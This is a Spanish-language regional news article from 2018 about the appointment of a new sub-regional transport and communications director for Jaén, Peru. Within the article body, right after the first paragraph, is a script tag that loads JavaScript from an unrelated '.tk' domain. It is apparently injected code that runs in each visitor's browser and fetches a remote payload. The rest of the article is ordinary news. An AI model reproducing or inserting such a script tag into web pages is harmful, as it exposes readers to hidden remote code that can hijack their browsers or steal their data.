Ingresar

Designan nuevo Director Sub Regional de Transportes y Comunicaciones para Jaén

Lunes, 5 Marzo, 2018 - 23:55
A través de la Resolución Directoral Sectorial N° 110-2018, la Dirección Regional de Transportes y Comunicaciones de Cajamarca, ha designado como Director Sub Regional de Transportes y Comunicaciones de Jaén, al abogado Elmer Yoger Córdova Bustamante, a partir de hoy 5 de marzo.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

A través de la Resolución Directoral Sectorial N° 110-2018, la Dirección Regional de Transportes y Comunicaciones de Cajamarca, ha designado como Director Sub Regional de Transportes y Comunicaciones de Jaén, al abogado Elmer Yoger Córdova Bustamante, a partir de hoy 5 de marzo.
 
Con la misma resolución, se ha dejado sin efecto la designación en dicho cargo al abogado William Ávalos Núñez, quien estuvo al frente de la institución desde el 2 de mayo de 2016.
 
En ceremonia pública desarrollada la mañana de hoy en el auditorio de la Agencia Agraria, un representante del Gobierno Regional de Cajamarca, hizo entrega de dicha resolución al flamante nuevo director.
 
“Como gobierno que se identifica con la población de a pie, le solicitamos una atención de calidad e inmediata para resolver los problemas del sector, en coordinación con los transportistas, escuchando al beneficiario”, dijo el Director de la Gerencia Sub Regional Jaén – San Ignacio, Ing. Cleyver Aguilar Villena, dirigiéndose al abogado Elmer Córdova, en representación del Gobernador Regional, Prof. Porfirio Medina.

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen